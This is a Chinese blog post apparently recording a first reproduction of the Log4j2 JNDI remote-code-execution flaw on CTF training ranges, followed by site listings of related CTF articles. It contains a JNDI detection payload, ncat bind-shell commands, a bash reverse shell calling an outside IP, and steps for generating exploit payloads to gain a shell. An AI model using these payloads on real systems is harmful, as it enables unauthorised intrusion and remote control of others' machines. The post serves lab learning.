log4j2复现

最新推荐文章于 2025-04-12 10:44:57 发布
最新推荐文章于 2025-04-12 10:44:57 发布
阅读量1k 收藏 20
点赞数 20
文章标签: log4j
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/2301_78280833/article/details/144953497
版权

记录一下第一次复现漏洞的操作

探测漏洞

利用到的工具:

burp suite

dnslog平台

DNSLog Platform

https://dig.pm/

靶场

封神台 - 掌控安全在线攻防演练靶场,一个专为网络安全从业人员设计的白帽黑客渗透测试演练平台。

Apache Log4j2 RCE - Bugku CTF平台

BUUCTF在线评测

这里复现的是封神台靶场

步骤

抓了一个登录的包修改参数探测是否有log4j2漏洞

利用dnslog平台构造payload

${jndi:ldap://${sys:java.version}.2496167e3a.ipv6.1433.eu.org.}

发完包后看到dns平台上带着java版本,说明存在log4j2漏洞

除了这个${sys:java.version}还可以看看下面的key

利用log4j2漏洞

利用到的工具有:

exp生成工具

https://github.com/welk1n/JNDI-Injection-Exploit?tab=readme-ov-file

编码工具

Runtime.exec Payload Generater | AresX's Blog

公网服务器(免费)

高防服务器_游戏服务器_香港云服务器_免费云服务器【阿贝云】

利用方式为反弹shell

反弹shell

这里是反弹shell的基础示例

正向连接

只需要让被攻击机监听

Windows控制Linux

Linux需要ncat -e /bin/sh -lvp 5566

解释

这个命令会让 Ncat 在本地 5566 端口上启动监听,并在有客户端连接时,提供一个 /bin/sh 的 shell,允许远程用户执行命令。

Windows直接连接目标IP的端口

Linux控制Windows

同理此时需要windows开启监听,输入:

ncat -e cmd -lvp 5566

Linux直接连接

ncat 192.168.0.105 5566

反向连接

只需要让攻击机监听即可

Windows控制了Linux

现在自己的攻击机上监听端口

在被攻击机上将自己的命令窗口给出去,给到攻击机的IP上

攻击机会立马有反应,可以执行命令,此时Windows控制了Linux

Linux控制Windows

Linux需要监听自己的端口了

Windows把自己的cmd给到攻击机上

Linux攻击机会立马有反应

安装exp工具

在服务器上安装exp工具

安装好后检查服务器上的 109913898180端口是否可用

$ java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar [-C] [command] [-A] [address]

  • -C - 远程class文件中要执行的命令。

(可选项 , 默认命令是mac下打开计算器,即"open /Applications/Calculator.app")

  • -A - 服务器地址,可以是IP地址或者域名。

(可选项 , 默认地址是第一个网卡地址)

命令结构

bash -i >& /dev/tcp/111.173.104.224:7777 0>&1
1. bash -i
  • bash 是 Linux 系统中的 Bourne Again Shell,是一种常见的命令解释器。
  • -i 表示以交互式模式运行 shell,即允许用户与 shell 进行交互(即使没有 TTY 也能模拟交互式操作)。
2. >& /dev/tcp/111.173.104.224:7777
  • >&:这是一个文件描述符重定向符号,表示将标准输出(stdout)和标准错误(stderr)同时重定向到指定目标。
  • /dev/tcp/111.173.104.224:7777
    • /dev/tcp/ 是 Bash 提供的一个特殊文件接口,用于通过 TCP 协议进行网络通信。
    • 111.173.104.224 是目标服务器的 IP 地址。
    • 7777 是目标服务器的监听端口。

此部分表示将 Bash 的输出通过 TCP 发送到 111.173.104.224:7777

3. 0>&1
  • 0:表示标准输入(stdin)。
  • >&1:将标准输入重定向到标准输出的位置。
  • 这个操作使得远程主机的输入能够被传递给本地 Bash 的标准输入,从而实现交互。

命令的整体逻辑

  1. 通过 bash -i 创建一个交互式 Bash 会话。
  2. 使用 /dev/tcp/ 将标准输出(stdout)和标准错误(stderr)发送到目标服务器的 IP 和端口(111.173.104.224:7777)。
  3. 将目标服务器通过端口 7777 发送的输入数据传递给 Bash 的标准输入(stdin)。

结果

  • 在目标服务器(111.173.104.224)上监听端口 7777 的攻击者会接收到反弹的 shell,从而控制运行此命令的主机。

将shell命令base64编码

放到-C后面

-A后面添加公网IP

运行工具生成,其中紫色为生成出来的payload,观察自己的网站能用哪个,用哪个

java -jar JNDI-Iniection-Exploit-1.0-SNAPSHOT-all.jar -C "编码后的结果" -A "公网IP"

新开一个窗口监听7777

这里我用的是第一个,需要url编码

编码后的结果,放到有漏洞的点上

监听窗口会立马显示上线

成功拿到shell

更详细的可以看看下面这个文章

Apache Log4j2漏洞 (CVE-2021-44228) 分析与复现-优快云博客

I0 0I
关注
探索BLE CTF:一款无线安全竞赛工具
gitblog_00013的博客
04-15 443
探索BLE CTF:一款无线安全竞赛工具 去发现同类优质开源项目:https://gitcode.com/ 项目简介 是一个基于蓝牙低功耗(Bluetooth Low Energy, BLE)技术的网络安全挑战平台。它旨在提供一个环境,让安全研究人员、爱好者和学生能够学习并实践针对BLE设备的安全测试和攻防技巧。通过模拟真实的漏洞和攻击场景,该项目为参与者提供了丰富的实战经验。 技术分析 BLE ...
CTF】BugkuCTF - 分析 - 手机热点
干铮的博客
09-02 874
1.下载附件用wireshark打开分析数据 httppan.baidu.coms1cwwdVC 有一天皓宝宝没了流量只好手机来共享,顺便又从手机发了点小秘密到电脑,你能找到它吗? 题目来源:第七季极客大挑战 根据题目,没有网还能共享文件,分析出可能是用蓝牙在共享 蓝牙协议 obex 2.根据obex协议过滤数据包。 3.导出分组字节流 4.导入到16进制编辑器中 5.导出成rar文件 5.打开压缩包得到flag图片 SYC{this_is_blueto
RSA广播攻击例题信安杯例题ezrsa
duwgv的博客
12-17 293
RSA广播攻击是一种针对RSA加密算法的攻击方式,特别适用于当相同的明文消息被使用相同的低加密指数(如e=3)加密并发送给多个接收者时。这种攻击利用了中国剩余定理(CRT)来恢复原始明文。下面我将以您提供的代码为例,详细解释RSA广播攻击的过程。
BLECTF_FUN:基于Hackgnar的ble_ctf的粉丝制做的蓝牙低功耗CTF
04-27
BLE夺旗:梦幻宇宙 BLECTF_FUN的目的是在ble_ctf的初始设计上。 尽管它重申了原始文档中的某些信息,但它也合并了最后几个标记中的一些新挑战。 所有标记都是由blectf_fun_story.py以故事格式引入和管理的。 标志会在输入时自动保存,并且在重新运行python脚本时会恢复进度。 CTF使用与原版相同的ESP32微控制器,并打算在完成原版后的一段时间用作复习课程。 设置CTF 访问进行设置。 如何查找标志 前两个之后的所有标志都直接对应于故事中的元素。 例如,与故事中的年长绅士交谈可能意味着您需要在其中一位绅士的地址上进行char-write-req --listen侦听。 请注意,所有读取,通知,指示的内容均应转换为ASCII。 esp32返回的内容有很多提示和含义,因此必须有一个十六进制到ascii转换器。所有标志都是20个字符,应以ASCII格式提交。 如何
CTF选手必藏的100个实战解题思路,从零基础到精通,收藏这篇就够了!
最新发布
Javachichi的博客
04-12 1188
CTF比赛,那可是网络安全圈的华山论剑。想在里面混出名堂?光有理论知识可不行,得有实战经验,还得会各种骚操作。今天,我就把多年来在CTF赛场上摸爬滚打总结出的100个解题思路分享出来,别说我没提醒你,能看懂一半,绝对是高手中的高手!
Sheridan-College-CTF-2021-Bluetooth-Workshop:我们在Sheridan College举办的研讨会的资料
03-18
频率分析:蓝牙安全性简介 目录: 车间介绍 欢迎来到Security Compass的蓝牙黑客实验室!该研讨会包含许多挑战,旨在教授蓝牙安全性的基本原理。这里有很多挑战需要解决。根据时间和技术难题,您可能可以全部解决! 挑战分为两部分:实时蓝牙攻击和破解挑战。实时蓝牙攻击引入了可以执行的攻击,以远程命令受害蓝牙设备。破解挑战证明了从许多不同的蓝牙配置中检索纯文本数据是多么容易。 挑战可以以任何顺序完成,但是我们建议您从实时挑战开始,因为您有助手可以帮助调试可能出现的技术问题。如果您没有完成所有挑战,请不要担心!挑战可以离线完成,我们提供了一个附录,其中包含设置您自己的实时蓝牙CTF的步骤! 祝你好运,玩得开心! 实时蓝牙攻击 概述 有些学生可能会认为,仅因为已配置了配对过程,就无法将恶意命令发送到该设备!他们会错的。只要未启用加密,GATTacker之类的工具就可以允许任何人远程连接并向受
安恒4月赛之蓝牙
weixin_41052824的博客
04-26 1970
今天打了一波CTF比赛,笔者在苦于签到题实在二丈摸不着头脑的时候,笔者的“弟弟”(引号中指某人)突然微信搞一句有一个数据包分析题 这个时候笔者就很高兴,但是没有立马去做这道题,捣鼓了一下签到题之后实在耐人寻味于是乎就去选择搞流量分析题了,一看“弟弟”给我发过来数据包,我就想那肯定得看一下题目呗,不然做个锤子起码题目也体现了方向,于是乎就找了一下原来就是蓝牙题(说是蓝牙题是因为笔者把题目忘了)...
CTF Web入门题目——Bugku Web 题目题解——发送HTTP请求篇(3道基础题目)
日熙的博客
07-14 6270
1)Bugku web基础$_GET: http://123.206.87.240:8002/get/ 题目: 思路: 关键是分析PHP代码: $what=$_get['what']———意思是用get方式提交what的值 if($what=='flag') echo 'flag{****}';———要令what变量与字符串‘flag’相等才 得到flag。 所以我们就直接在地址栏中加上?what=flag。 其中?是变量的标识,这句话表示有一个名为what,值为flag的变量。 答案为:flag{bug
CTF】利用dockerfile复现CTF题目
网络空间安全|人工智能|计算机科学
10-22 681
(最后的点不能丢)
网络安全 CTF 入门.pdf
07-09
网络安全 CTF 入门
CTF100题目-安全考题竞赛
04-26
在解题模式CTF赛制中,参赛队伍可以通过互联网或者现场网络参与,这种模式的CTF竞赛与ACM编程竞赛、信息学奥赛比较类似,以解决网络安全技术挑战题目的分值和时间来排名,通常用于在线选拔赛。题目主要包含逆向、...
2019某行业CTF大赛题目复现——图片隐写
qwsn
11-06 2537
0x01上题目附件: 百度网盘地址 提取码 https://pan.baidu.com/s/13hDSgmW4cn9gEWqHjJrWIw 20ra 0x02WP复现: 1.打开图片:发现宽和高好像没有什么问题; 但是我们还是使用010软件,修改后查看一下,万一就是那么简单呢? 一顿操作猛如虎,一看战绩一杠五。。。。。。发现改完宽高后,图片损坏了,无法打开。看来要使用其他方法...
CTF(misc) easy_nbt
m0_59197314的博客
07-25 302
解压文件,发现了一个level.dat文件,用010editor打开,文件头为1F8B0800,搜索发现是gzip文件,修改文件后缀为.zip,解压后的文件用010editor打开,在侧边中找到了结果flag{Do_u_kN0w_nbt?
蓝牙----wireshark抓包查看蓝牙通信过程
qq_43306777的博客
05-27 8240
通过wireshark抓包,对蓝牙连接建立,数据传输进行分析
CTF——流量分析题型整理总结
热门推荐
小锤队长的博客
12-19 5万+
我见过的流量分析类型的题目总结: 一,ping 报文信息 (icmp协议) 二,上传/下载文件(蓝牙obex,http,难:文件的分段上传/下载) 三,sql注入攻击 四,访问特定的加密解密网站(md5,base64) 五,后台扫描+弱密码爆破+菜刀 六,usb流量分析 七,WiFi无线密码破解 八,根据一组流量包了解黑客的具体行为 例题: 一,ping 报文信息 (icm...
CTF——MISC——流量分析
小锤队长的博客
09-26 2万+
目录 一、流量包修复 二、协议分析 三、数据提取 例题: 1,题目:Cephalopod(图片提取) 2,题目:特殊后门(icmp协议信息传输) 3,题目:手机热点(蓝牙传输协议obex,数据提取) 4,题目:想蹭网先解开密码(无线密码破解) 5,我的的教练也想打CTF 概括来讲在比赛中的流量分析有以下三个方向: 1、流量包修复 2、协议分析 3、数据提取 一、流量包修复 ...
【2023饶派杯车联网CTF】Web-对访客开放的车载系统 writeup
ShangYaoPaiGu的博客
06-01 1357
这是由于代码中包含很多特殊字符,导致在处理图片文件时出现错误,这里进行修改,把对应的源数据用python的函数。可以发现这又是一个套娃解密,反过来写就行了,就是要注意一下。函数,可以合理猜测获取flag关键的一步应该在。可能是原作者在内容处理没有做过多的修饰(把得到的result放到cookie中的。进行解析,解析不了就去掉一些头或者尾。代码比较乱,但是可以在后面找到一个。在登入页面使用字典跑一遍,发现。根据hint,涉及到的漏洞。下面是通过任意读取获得的。就可以拿到flag了。
[ctf]知识汇总1
qq_61109509的博客
04-09 605
dirsearch
CTF隐写——越光宝盒
weixin_34381666的博客
09-23 277
0x题目   原题来自于实验吧:http://www.shiyanbar.com/ctf/1992   一句话,和一个PNG图片。 0x解题   1.下载图片以后,发现打不开。      首先想到的就是文件头可能被修改了,那么先把文件修复。用Hex Workshop 打开图片      2.很明显的文件头被修改过了。   PNG格式文件头位置的固定字节如下: 十进制数 ...
网络安全入门CTF MISC杂项题目解析
对于网络安全领域的初学者来说,CTF-MISC入门难度的题目是绝佳的学习材料,能够帮助他们打下坚实的基础,并逐步熟悉网络安全中常见的攻防技术和工具。通过解决实际的问题,初学者能够快速提升自己的技能,为日后面对...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值